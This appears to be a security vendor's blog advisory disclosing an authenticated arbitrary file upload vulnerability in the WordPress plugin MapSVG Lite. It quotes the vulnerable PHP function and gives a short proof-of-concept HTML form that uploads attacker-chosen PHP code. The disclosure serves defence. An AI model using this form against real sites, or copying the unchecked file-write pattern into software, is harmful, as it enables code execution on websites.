One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited. That sometimes leads to us catching a vulnerability of a more limited variant of one of those serious vulnerability types, which isn’t as much concern for the average website, but could be utilized in a targeted attack. That happened with the authenticated arbitrary file upload vulnerability we found in the plugin MapSVG Lite. This vulnerability could allow an attacker that had access to a WordPress account to upload arbitrary files to the website. It also could allow an attacker that could get a user logged in to visit a URL the attacker controls, to exploit the vulnerability as well.

Since the check used to spot this is also included in our Plugin Security Checker (which  is accessible through a WordPress plugin of its own), it is another of reminder of how that can help to indicate which plugins are in greater need of security review (for which we do as part of our service as well as separately).

The vulnerability occurs in the function mapsvg_upload(). That function, which is located in the file /mapsvg.php, would create a file with a filename and contents specified by user input that will be placed in the directory /wp-content/uploads/mapsvg/:

2733
2734
2735
2736
2737
2738
2739
2740
2741
2742
2743
2744
2745
2746
2747
2748
2749
2750

function mapsvg_upload () {
    $mapsvg_error = mapsvg_check_upload_dir();
 
    if(!$mapsvg_error){
        $filename = sanitize_file_name(basename($_POST["filename"]));
        $target_file = MAPSVG_MAPS_UPLOADS_DIR . "/".$filename;
 
//        $file_parts = pathinfo($_FILES['svg_file']['name']);
 
        $file = fopen($target_file, 'w');
        fwrite($file, stripslashes($_POST['data']));
        fclose($file);
 
        echo $filename;
 
    }
    die();
}

That function is accessible through WordPress’ AJAX functionality to anyone logged in to WordPress:

add_action('wp_ajax_mapsvg_upload', 'mapsvg_upload');

There is a similar issue with another AJAX accessible function, ajax_mapsvg_save_svg().

We notified the developer of the issue a week ago. We haven’t heard back from them and no new version has been released to fix the issue. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.

If you were using our service not only would you be warned about this issue promptly after it was disclosed if you were using the plugin, but we would be there to help you deal with the issue on your website.

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/uploads/mapsvg/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=mapsvg_upload" method="POST">
<input type="hidden" name="filename" value="test2.php" />
<input type="hidden" name="data" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>

Timeline

• July 11, 2018 – Developer notified.

Concerned About The Security of the Plugins You Use?